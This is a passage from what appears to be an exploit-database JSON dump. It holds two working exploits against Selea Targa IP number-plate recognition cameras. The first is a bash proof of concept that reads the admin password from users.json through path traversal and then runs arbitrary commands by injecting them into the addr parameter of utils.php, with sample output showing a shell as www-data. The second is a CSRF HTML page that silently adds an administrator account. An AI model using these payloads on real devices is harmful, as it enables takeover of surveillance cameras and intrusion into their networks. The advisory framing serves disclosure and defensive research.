RESULT=$(/bin/ping -I eth0 -W 1 -q -c 1 \"$ADDR\" 2>&1 )\r\n# 11: elif [ \"$CMD\" == \"port\" ]; then\r\n# 12: log \"/usr/bin/nc -w 1 -v -z $ADDR $PORT\"\r\n# 13: RESULT=$(/usr/bin/nc -w 1 -v -z \"$ADDR\" \"$PORT\" 2>&1 )\r\n# 14: fi\r\n# 15:\r\n# 16: echo -e \"$RESULT\"\r\n#\r\n# =====================================================================================\r\n#\r\n# Tested on: GNU/Linux 3.10.53 (armv7l)\r\n# PHP/5.6.22\r\n# selea_httpd\r\n# HttpServer/0.1\r\n# SeleaCPSHttpServer/1.1\r\n#\r\n#\r\n# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic\r\n# @zeroscience\r\n#\r\n#\r\n# Advisory ID: ZSL-2021-5620\r\n# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5620.php\r\n#\r\n#\r\n# 07.11.2020\r\n#\r\n#\r\n\r\n\r\n# PoC chained exploit (as admin):\r\n#\r\n# solidsnake@metalgear:~/prive$ ./selea.sh 192.168.1.17 id\r\n# Password found: testingus\r\n# Using Authorization: YWRtaW46dGVzdGluZ3VzCg==\r\n# Using command: id\r\n# uid=33(www-data) gid=33(www-data) groups=33(www-data)\r\n#\r\n#\r\nIP=$1\r\nCMD=$2\r\nPWD=`curl -s http://${IP}/CFCARD/images/SeleaCamera/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fmnt/data/auth/users.json |grep -oP 'root_pwd\": \"\\K.*?(?=\",)'`\r\necho 'Password found: '${PWD}\r\nAUTH=$(echo admin:${PWD} | base64)\r\necho 'Using Authorization: '${AUTH}\r\necho 'Using command: '${CMD}\r\ncurl -s \"http://${IP}/cgi-bin/utils.php?cmd=addr_check&addr=1.3.3.7\\$(${CMD})&type=port&port=80\" -H \"Authorization: Basic ${AUTH}\" |grep -oP '1.3.3.7\\K.*?(?=\")'", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/49460"}, {"lastseen": "2021-01-22T09:06:22", "description": "", "published": "2021-01-22T00:00:00", "type": "exploitdb", "title": "Selea Targa IP OCR-ANPR Camera - CSRF Add Admin", "bulletinFamily": "exploit", "cvelist": [], "modified": "2021-01-22T00:00:00", "id": "EDB-ID:49458", "href": "https://www.exploit-db.com/exploits/49458", "sourceData": "# Exploit Title: Selea Targa IP OCR-ANPR Camera - CSRF Add Admin\r\n# Date: 07.11.2020\r\n# Exploit Author: LiquidWorm\r\n# Vendor Homepage: https://www.selea.com\r\n\r\nSelea Targa IP OCR-ANPR Camera CSRF Add Admin Exploit\r\n\r\n\r\nVendor: Selea s.r.l.\r\nProduct web page: https://www.selea.com\r\nAffected version: Model: iZero\r\n Targa 512\r\n Targa 504\r\n Targa Semplice\r\n Targa 704 TKM\r\n Targa 805\r\n Targa 710 INOX\r\n Targa 750\r\n Targa 704 ILB\r\n Firmware: BLD201113005214\r\n BLD201106163745\r\n BLD200304170901\r\n BLD200304170514\r\n BLD200303143345\r\n BLD191118145435\r\n BLD191021180140\r\n BLD191021180140\r\n CPS: 4.013(201105)\r\n 3.100(200225)\r\n 3.005(191206)\r\n 3.005(191112)\r\n\r\nSummary: IP camera with optical character recognition (OCR) software for automatic\r\nnumber plate recognition (ANPR) also equipped with ADR system that enables it to read\r\nthe Hazard Identification Number (HIN, also known as the Kemler Code) and UN number\r\nof any vehicle captured in free-flow mode. TARGA is fully accurate in reading number\r\nplates of vehicles travelling at high speed. Its varifocal, wide-angle lens makes\r\nthis camera suitable for all installation conditions. Its built-in OCR software works\r\nas an automatic and independent system without the need of a computer, thus giving\r\nautonomy to the device even in the event of an interruption in the connection between\r\nthe camera and the operations centre.\r\n\r\nDesc: The application interface allows users to perform certain actions via HTTP requests\r\nwithout performing any validity checks to verify the requests. This can be exploited to\r\nperform certain actions with administrative privileges if a logged-in user visits a malicious\r\nweb site.\r\n\r\nTested on: GNU/Linux 3.10.53 (armv7l)\r\n PHP/5.6.22\r\n selea_httpd\r\n HttpServer/0.1\r\n SeleaCPSHttpServer/1.1\r\n\r\n\r\nVulnerability discovered by Gjoko 'LiquidWorm' Krstic\r\n @zeroscience\r\n\r\n\r\nAdvisory ID: ZSL-2021-5618\r\nAdvisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5618.php\r\n\r\n\r\n07.11.2020\r\n\r\n--\r\n\r\n\r\nAdd Admin:\r\n----------\r\n\r\n<html>\r\n <body>\r\n <script>\r\n function submitRequest()\r\n {\r\n var xhr = new XMLHttpRequest();\r\n xhr.open(\"POST\", \"http:\\/\\/192.168.1.17\\/save_params.php\", true);\r\n xhr.setRequestHeader(\"Accept\", \"*\\/*\");\r\n xhr.setRequestHeader(\"Accept-Language\", \"en-US,en;q=0.9\");\r\n xhr.setRequestHeader(\"Content-Type\", \"multipart\\/form-data; boundary=cfgboundary-----------------------1607475234133\");\r\n xhr.withCredentials = true;\r\n var body = \"--cfgboundary-----------------------1607475234133\\r\\n\" + \r\n \"Content-Disposition: form-data; name=\\\"set_params\\\"\\r\\n\" + \r\n \"\\r\\n\" + \r\n \"upload\\r\\n\" + \r\n \"--cfgboundary-----------------------1607475234133\\r\\n\" + \r\n \"Content-Disposition: form-data; name=\\\"user_file\\\"; filename=\\\"set_params.dat\\\"\\r\\n\" + \r\n \"Content-Type: application/octet-stream\\r\\n\" + \r\n \"\\r\\n\" + \r\n \"[SECURITY.USERS]\\r\\n\" + \r\n \"security-users-0-username = testingus\\r\\n\" + \r\n \"security-users-0-password = testingus\\r\\n\" + \r\n \"security-users-0-rights = 2\\r\\n\" + \r\n \"security-users-1-username = \\r\\n\" + \r\n \"security-users-1-password = \\r\\n\" + \r\n \"security-users-1-rights = 0\\r\\n\" + \r\n \"security-users-2-username = \\r\\n\" + \r\n \"security-users-2-password = \\r\\n\" + \r\n \"security-users-2-rights = 0\\r\\n\" + \r\n \"security-users-3-username = \\r\\n\" + \r\n \"security-users-3-password = \\r\\n\" + \r\n \"security-users-3-rights = 0\\r\\n\" + \r\n \"security-allow_viewers_storage_access = 1\\r\\n\" + \r\n \"CFG_ROOTPASS = admin\\r\\n\" + \r\n \"\\r\\n\" + \r\n \"--cfgboundary-----------------------1607475234133--\\r\\n\";\r\n var aBody = new Uint8Array(body.length);\r\n for (var i = 0; i < aBody.length; i++)\r\n aBody[i] = body.charCodeAt(i); \r\n xhr.send(new Blob([aBody]));\r\n }\r\n </script>\r\n <form action=\"#\">\r\n <input type=\"button\" value=\"Add Admin\" onclick=\"submitRequest();\" />\r\n </form>\r\n </body>\r\n</html>", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/49458"}]}